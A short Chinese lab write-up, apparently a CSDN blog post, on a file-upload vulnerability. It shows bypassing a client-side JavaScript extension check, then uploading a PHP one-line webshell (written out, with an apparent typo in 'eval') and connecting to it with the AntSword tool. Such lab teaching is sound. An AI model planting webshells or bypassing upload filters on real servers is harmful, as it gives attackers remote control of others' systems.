文件上传的小点总结

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

//判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);
        return false;
    }

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值